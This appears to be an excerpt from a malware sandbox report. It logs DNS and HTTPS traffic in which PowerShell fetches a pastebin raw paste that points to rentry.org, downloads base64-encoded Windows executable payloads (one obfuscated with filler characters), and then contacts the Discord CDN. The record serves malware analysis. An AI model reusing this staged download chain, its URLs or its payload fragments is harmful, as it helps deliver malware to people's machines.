                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Oct 31, 2024 07:43:03.516382933 CET1.1.1.1192.168.2.60x45e6No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 07:43:03.516382933 CET1.1.1.1192.168.2.60x45e6No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 07:43:03.516382933 CET1.1.1.1192.168.2.60x45e6No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 07:43:08.331690073 CET1.1.1.1192.168.2.60x990bNo error (0)rentry.org164.132.58.105A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 07:43:15.880495071 CET1.1.1.1192.168.2.60x8903No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 07:43:15.880495071 CET1.1.1.1192.168.2.60x8903No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 07:43:15.880495071 CET1.1.1.1192.168.2.60x8903No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 07:43:15.880495071 CET1.1.1.1192.168.2.60x8903No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 07:43:15.880495071 CET1.1.1.1192.168.2.60x8903No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • pastebin.com
                                                                              • rentry.org
                                                                              • cdn.discordapp.com

                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.649709104.20.3.2354433460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-31 06:43:04 UTC169OUTGET /raw/J6uRjZrv HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: pastebin.com
                                                                              Connection: Keep-Alive
                                                                              2024-10-31 06:43:04 UTC397INHTTP/1.1 200 OK
                                                                              Date: Thu, 31 Oct 2024 06:43:04 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              x-frame-options: DENY
                                                                              x-content-type-options: nosniff
                                                                              x-xss-protection: 1;mode=block
                                                                              cache-control: public, max-age=1801
                                                                              CF-Cache-Status: HIT
                                                                              Age: 118
                                                                              Last-Modified: Thu, 31 Oct 2024 06:41:06 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 8db1ab2f6b796b07-DFW
                                                                              2024-10-31 06:43:04 UTC37INData Raw: 31 66 0d 0a 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 6f 72 67 2f 76 73 6d 34 6f 66 78 73 2f 72 61 77 0d 0a
                                                                              Data Ascii: 1fhttps://rentry.org/vsm4ofxs/raw
                                                                              2024-10-31 06:43:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.649712164.132.58.1054431816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-31 06:43:09 UTC167OUTGET /vsm4ofxs/raw HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: rentry.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-31 06:43:09 UTC319INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Thu, 31 Oct 2024 06:43:09 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Content-Length: 82604
                                                                              Connection: close
                                                                              Vary: Origin
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Content-Type-Options: nosniff
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                              Cache-Control: Vary
                                                                              2024-10-31 06:43:09 UTC16065INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 50 79 66 49 57 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 69 41 4c 41 56 41 41 41 4f 6f 41 41 41 41 47 41 41 41 41 41 41 41 41 54 67 6b 42 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 67 41 41 41 41 41 67 41
                                                                              Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAPyfIWcAAAAAAAAAAOAAIiALAVAAAOoAAAAGAAAAAAAATgkBAAAgAAAAAAAAAAAAEAAgAAAAAgA
                                                                              2024-10-31 06:43:09 UTC16384INData Raw: 47 39 38 41 41 41 4b 4b 67 4d 65 62 33 77 41 41 41 6f 71 41 78 38 73 62 33 77 41 41 41 6f 71 41 78 39 79 62 33 77 41 41 41 6f 71 41 78 39 30 62 33 77 41 41 41 6f 71 41 78 38 58 62 33 77 41 41 41 6f 71 41 78 38 4e 62 33 77 41 41 41 6f 71 41 78 38 4a 62 33 77 41 41 41 6f 71 41 78 74 76 66 41 41 41 43 69 6f 44 48 78 4e 76 66 41 41 41 43 69 6f 44 48 78 46 76 66 41 41 41 43 69 6f 44 48 78 5a 76 66 41 41 41 43 69 6f 44 49 4a 6f 41 41 41 42 76 66 41 41 41 43 69 6f 44 48 32 42 76 66 41 41 41 43 69 6f 44 48 7a 68 76 66 41 41 41 43 69 6f 44 49 4e 59 41 41 41 42 76 66 41 41 41 43 69 6f 44 49 49 34 41 41 41 42 76 66 41 41 41 43 69 6f 44 48 32 6c 76 66 41 41 41 43 69 6f 44 49 50 34 41 41 41 42 76 66 41 41 41 43 67 4d 61 62 33 77 41 41 41 6f 71 41 78 38 74 62 33 77 41
                                                                              Data Ascii: G98AAAKKgMeb3wAAAoqAx8sb3wAAAoqAx9yb3wAAAoqAx90b3wAAAoqAx8Xb3wAAAoqAx8Nb3wAAAoqAx8Jb3wAAAoqAxtvfAAACioDHxNvfAAACioDHxFvfAAACioDHxZvfAAACioDIJoAAABvfAAACioDH2BvfAAACioDHzhvfAAACioDINYAAABvfAAACioDII4AAABvfAAACioDH2lvfAAACioDIP4AAABvfAAACgMab3wAAAoqAx8tb3wA
                                                                              2024-10-31 06:43:09 UTC16384INData Raw: 41 51 43 49 41 45 42 41 41 42 5a 6c 46 51 71 45 7a 41 45 41 46 4d 41 41 41 41 2b 41 41 41 52 66 71 51 41 41 41 51 43 4b 41 49 41 41 43 73 4b 42 68 59 76 42 51 5a 6d 46 31 6b 4b 41 77 59 67 41 51 45 41 41 46 68 55 4b 78 49 48 52 51 4d 41 41 41 41 45 41 41 41 41 45 77 41 41 41 43 41 41 41 41 41 57 43 79 76 71 42 41 4a 2b 70 41 41 41 42 41 61 55 57 56 51 58 43 79 76 62 42 58 36 6c 41 41 41 45 42 70 52 55 47 41 73 72 7a 69 6f 41 45 7a 41 45 41 45 30 41 41 41 41 2b 41 41 41 52 66 71 59 41 41 41 51 43 4b 41 49 41 41 43 73 4b 42 68 59 76 42 51 5a 6d 46 31 6b 4b 41 77 5a 55 4b 78 49 48 52 51 4d 41 41 41 41 45 41 41 41 41 45 51 41 41 41 43 41 41 41 41 41 58 43 79 76 71 42 58 36 6e 41 41 41 45 42 70 52 55 47 41 73 72 33 51 51 43 66 71 59 41 41 41 51 47 6c 46 6c 55
                                                                              Data Ascii: AQCIAEBAABZlFQqEzAEAFMAAAA+AAARfqQAAAQCKAIAACsKBhYvBQZmF1kKAwYgAQEAAFhUKxIHRQMAAAAEAAAAEwAAACAAAAAWCyvqBAJ+pAAABAaUWVQXCyvbBX6lAAAEBpRUGAsrzioAEzAEAE0AAAA+AAARfqYAAAQCKAIAACsKBhYvBQZmF1kKAwZUKxIHRQMAAAAEAAAAEQAAACAAAAAXCyvqBX6nAAAEBpRUGAsr3QQCfqYAAAQGlFlU
                                                                              2024-10-31 06:43:10 UTC16384INData Raw: 77 42 6f 41 41 41 42 45 41 43 54 44 67 41 41 65 41 42 5a 41 47 67 41 41 41 41 51 41 4b 67 4f 41 41 43 41 41 46 73 41 62 67 41 41 41 52 41 41 74 68 41 41 41 48 67 41 58 51 42 31 41 41 41 42 45 41 43 64 45 77 41 41 65 41 42 66 41 48 73 41 41 41 45 51 41 47 4d 55 41 41 42 34 41 46 38 41 66 77 43 41 41 42 41 41 66 68 51 41 41 49 41 41 58 77 43 44 41 41 41 41 45 41 43 54 46 41 41 41 67 41 42 67 41 49 73 41 41 41 41 51 41 4b 6f 55 41 41 43 55 41 47 45 41 6a 77 41 41 41 42 41 41 32 68 51 41 41 41 6b 41 5a 51 43 67 41 41 41 41 45 41 44 51 46 51 41 41 43 51 42 6d 41 4b 49 41 41 41 45 41 41 4f 55 56 41 41 44 56 41 47 30 41 6f 77 41 41 41 42 41 41 6e 67 45 41 41 4a 51 41 63 41 43 6a 41 41 41 41 45 41 44 48 41 51 41 41 43 51 42 30 41 4b 67 41 41 41 41 51 41 4f 59 42
                                                                              Data Ascii: wBoAAABEACTDgAAeABZAGgAAAAQAKgOAACAAFsAbgAAARAAthAAAHgAXQB1AAABEACdEwAAeABfAHsAAAEQAGMUAAB4AF8AfwCAABAAfhQAAIAAXwCDAAAAEACTFAAAgABgAIsAAAAQAKoUAACUAGEAjwAAABAA2hQAAAkAZQCgAAAAEADQFQAACQBmAKIAAAEAAOUVAADVAG0AowAAABAAngEAAJQAcACjAAAAEADHAQAACQB0AKgAAAAQAOYB
                                                                              2024-10-31 06:43:10 UTC16384INData Raw: 41 41 41 41 41 41 41 41 51 44 71 43 77 41 41 41 41 41 4b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4b 41 41 30 43 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 78 78 45 41 41 4c 67 41 41 41 41 43 41 41 41 41 58 67 45 41 41 41 55 41 42 41 41 47 41 41 51 41 44 77 41 4f 41 42 41 41 44 77 41 52 41 41 34 41 4c 77 41 75 41 44 4d 41 4d 67 41 30 41 44 49 41 4f 67 41 35 41 44 73 41 4f 51 41 38 41 44 6b 41 41 41 41 51 41 41 77 41 74 41 45 41 41 42 41 41 47 51 43 30 41 51 41 41 41 41 41 62 41 4c 51 42 48 51 41 72 41 65 38 42 32 41 37 78 41 53 38 50 41 41 41 41 54 47 52 6a 58 30 6b 30 58 7a 41 41 54 47 52 73 62 32 4e 66 4d 41 42 54 64 47 78 76 59 31 38 77 41 45 78 6b 59 58 4a 6e 58 7a 41 41 55 30 68 42 4d 51 42 4d 5a 47 4e 66 53 54 52 66 54 54 45 41 54 47 52 6a
                                                                              Data Ascii: AAAAAAAAQDqCwAAAAAKAAAAAAAAAAAAAAAKAA0CAAAAAAAAAAABAAAAxxEAALgAAAACAAAAXgEAAAUABAAGAAQADwAOABAADwARAA4ALwAuADMAMgA0ADIAOgA5ADsAOQA8ADkAAAAQAAwAtAEAABAAGQC0AQAAAAAbALQBHQArAe8B2A7xAS8PAAAATGRjX0k0XzAATGRsb2NfMABTdGxvY18wAExkYXJnXzAAU0hBMQBMZGNfSTRfTTEATGRj
                                                                              2024-10-31 06:43:10 UTC1003INData Raw: 51 41 41 41 46 51 41 5a 51 42 6f 41 48 55 41 62 41 42 6a 41 47 67 41 5a 51 42 7a 41 46 67 41 65 41 42 59 41 48 67 41 65 41 41 75 41 47 51 41 62 41 42 73 41 41 41 41 41 41 41 38 41 41 34 41 41 51 42 51 41 48 49 41 62 77 42 6b 41 48 55 41 59 77 42 30 41 45 34 41 59 51 42 74 41 47 55 41 41 41 41 41 41 45 4d 41 62 41 42 68 41 48 4d 41 63 77 42 4d 41 47 6b 41 59 67 42 79 41 47 45 41 63 67 42 35 41 44 4d 41 41 41 41 30 41 41 67 41 41 51 42 51 41 48 49 41 62 77 42 6b 41 48 55 41 59 77 42 30 41 46 59 41 5a 51 42 79 41 48 4d 41 61 51 42 76 41 47 34 41 41 41 41 78 41 43 34 41 4d 41 41 75 41 44 41 41 4c 67 41 77 41 41 41 41 4f 41 41 49 41 41 45 41 51 51 42 7a 41 48 4d 41 5a 51 42 74 41 47 49 41 62 41 42 35 41 43 41 41 56 67 42 6c 41 48 49 41 63 77 42 70 41 47 38 41
                                                                              Data Ascii: QAAAFQAZQBoAHUAbABjAGgAZQBzAFgAeABYAHgAeAAuAGQAbABsAAAAAAA8AA4AAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8A


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.649738104.20.3.2354433460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-31 06:43:13 UTC74OUTGET /raw/4B83LcVU HTTP/1.1
                                                                              Host: pastebin.com
                                                                              Connection: Keep-Alive
                                                                              2024-10-31 06:43:13 UTC397INHTTP/1.1 200 OK
                                                                              Date: Thu, 31 Oct 2024 06:43:13 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              x-frame-options: DENY
                                                                              x-content-type-options: nosniff
                                                                              x-xss-protection: 1;mode=block
                                                                              cache-control: public, max-age=1801
                                                                              CF-Cache-Status: HIT
                                                                              Age: 118
                                                                              Last-Modified: Thu, 31 Oct 2024 06:41:15 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 8db1ab6848d63168-DFW
                                                                              2024-10-31 06:43:13 UTC37INData Raw: 31 66 0d 0a 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 6f 72 67 2f 73 68 71 6d 36 67 39 70 2f 72 61 77 0d 0a
                                                                              Data Ascii: 1fhttps://rentry.org/shqm6g9p/raw
                                                                              2024-10-31 06:43:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.649744164.132.58.1054433460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-31 06:43:14 UTC72OUTGET /shqm6g9p/raw HTTP/1.1
                                                                              Host: rentry.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-31 06:43:14 UTC320INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Thu, 31 Oct 2024 06:43:14 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Content-Length: 270652
                                                                              Connection: close
                                                                              Vary: Origin
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Content-Type-Options: nosniff
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                              Cache-Control: Vary
                                                                              2024-10-31 06:43:14 UTC16064INData Raw: 3d e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93
                                                                              Data Ascii: =
                                                                              2024-10-31 06:43:14 UTC16384INData Raw: 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93
                                                                              Data Ascii:
                                                                              2024-10-31 06:43:14 UTC16384INData Raw: 93 94 51 5a e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 43 e2 93 94 e2 93 94 e2 93 94 73 42 51 5a e2 93 94 e2 93 94 e2 93 94 49 47 e2 93 94 e2 93 94 e2 93 94 68 42 67 59 5a e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 39 42 e2 93 94 e2 93 94 e2 93 94 4d e2 93 94 e2 93 94 e2 93 94 73 48 e2 93 94 e2 93 94 e2 93 94 67 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 4f e2 93 94 e2 93 94 e2 93 94 55 47 e2 93 94 e2 93 94 e2 93 94 67 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 62 e2 93 94 e2 93 94 e2 93 94 55 47 e2 93 94 e2 93 94 e2 93 94 69 42 51 59 e2 93 94 e2 93 94 e2 93 94 49 57 47 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 77 53
                                                                              Data Ascii: QZCsBQZIGhBgYZ9BMsHgOUGgbUGiBQYIWGIwS
                                                                              2024-10-31 06:43:15 UTC16384INData Raw: 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 62 43 51 36 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 5a 43 e2 93 94 e2 93 94 e2 93 94 36 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 58 43 77 35 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 58 43 67 35 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 56 43 77 34 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 56 43 67 34 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 54 43 51 34 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 52 43 e2 93 94 e2 93
                                                                              Data Ascii: bCQ6IZC6IXCw5EXCg5IVCw4EVCg4ITCQ4IRC
                                                                              2024-10-31 06:43:15 UTC16384INData Raw: e2 93 94 61 e2 93 94 e2 93 94 e2 93 94 55 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 49 51 2f e2 93 94 e2 93 94 e2 93 94 51 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 4d e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 7a e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 45 67 70 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 7a e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93
                                                                              Data Ascii: aUIQ/QIIMEzIEgpEEzI
                                                                              2024-10-31 06:43:15 UTC16384INData Raw: 37 e2 93 94 e2 93 94 e2 93 94 78 62 55 51 4c e2 93 94 e2 93 94 e2 93 94 42 43 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 67 6a 55 46 51 4f 51 67 45 46 49 43 51 6b e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 30 49 35 42 63 44 45 53 52 52 65 e2 93 94 e2 93 94 e2 93 94 45 4a e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 4e 79 62 e2 93 94 e2 93 94 e2 93 94 31 e2 93 94 e2 93 94 e2 93 94 42 53 55 51 47 e2 93 94 e2 93 94 e2 93 94 52 43 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93
                                                                              Data Ascii: 7xbUQLBCgjUFQOQgEFICQk0I5BcDESRReEJNyb1BSUQGRC
                                                                              2024-10-31 06:43:15 UTC16384INData Raw: 93 94 e2 93 94 55 55 42 61 4f 67 64 42 59 4d e2 93 94 e2 93 94 e2 93 94 44 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 43 56 51 6a 44 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 47 44 77 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 51 51 46 51 34 e2 93 94 e2 93 94 e2 93 94 46 47 67 78 e2 93 94 e2 93 94 e2 93 94 4d e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2
                                                                              Data Ascii: UUBaOgdBYMDCVQjDYGDwQQFQ4FGgxM
                                                                              2024-10-31 06:43:15 UTC16384INData Raw: 93 94 e2 93 94 59 77 43 76 58 67 34 e2 93 94 e2 93 94 e2 93 94 59 77 45 31 4f 51 4d e2 93 94 e2 93 94 e2 93 94 59 77 45 31 47 68 7a e2 93 94 e2 93 94 e2 93 94 59 77 45 31 2b 51 4b e2 93 94 e2 93 94 e2 93 94 59 77 43 76 33 e2 93 94 e2 93 94 e2 93 94 38 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 2f 77 64 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 2f 51 57 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 4c 68 5a e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 37 77 54 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 37 67 57 e2 93 94 e2 93 94 e2 93 94 59 77 45 31 75 e2 93 94 e2 93 94 e2 93 94 55 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 37 e2 93 94 e2 93
                                                                              Data Ascii: YwCvXg4YwE1OQMYwE1GhzYwE1+QKYwCv38YD7/wdYD7/QWYD7LhZYD77wTYD77gWYwE1uUYD77
                                                                              2024-10-31 06:43:15 UTC16384INData Raw: 72 51 77 45 58 73 69 4d 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 64 76 6e e2 93 94 e2 93 94 e2 93 94 46 51 2b 4b 45 4d 68 46 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 34 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 77 43 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 77 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 46 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 51 51 52 45 45 78 46 72 51 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2
                                                                              Data Ascii: rQwEXsiMEdvnFQ+KEMhF4wCwEFQQREExFrQ
                                                                              2024-10-31 06:43:15 UTC16384INData Raw: 93 94 e2 93 94 e2 93 94 44 42 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 6f 48 e2 93 94 e2 93 94 e2 93 94 46 e2 93 94 e2 93 94 e2 93 94 7a 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 67 4b 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 33 58 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 42 4e 43 78 48 43 6f e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 38 e2 93 94 e2 93 94 e2 93 94 4b 43 49 6c 4b 55 4f e2 93 94 e2 93 94 e2 93 94 42 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 77 37 4a 67 4a 71 51 e2 93 94 e2 93
                                                                              Data Ascii: DBoHFzEgKE3XBNCxHCo8KCIlKUOBw7JgJqQ


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.649756162.159.135.2334433460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
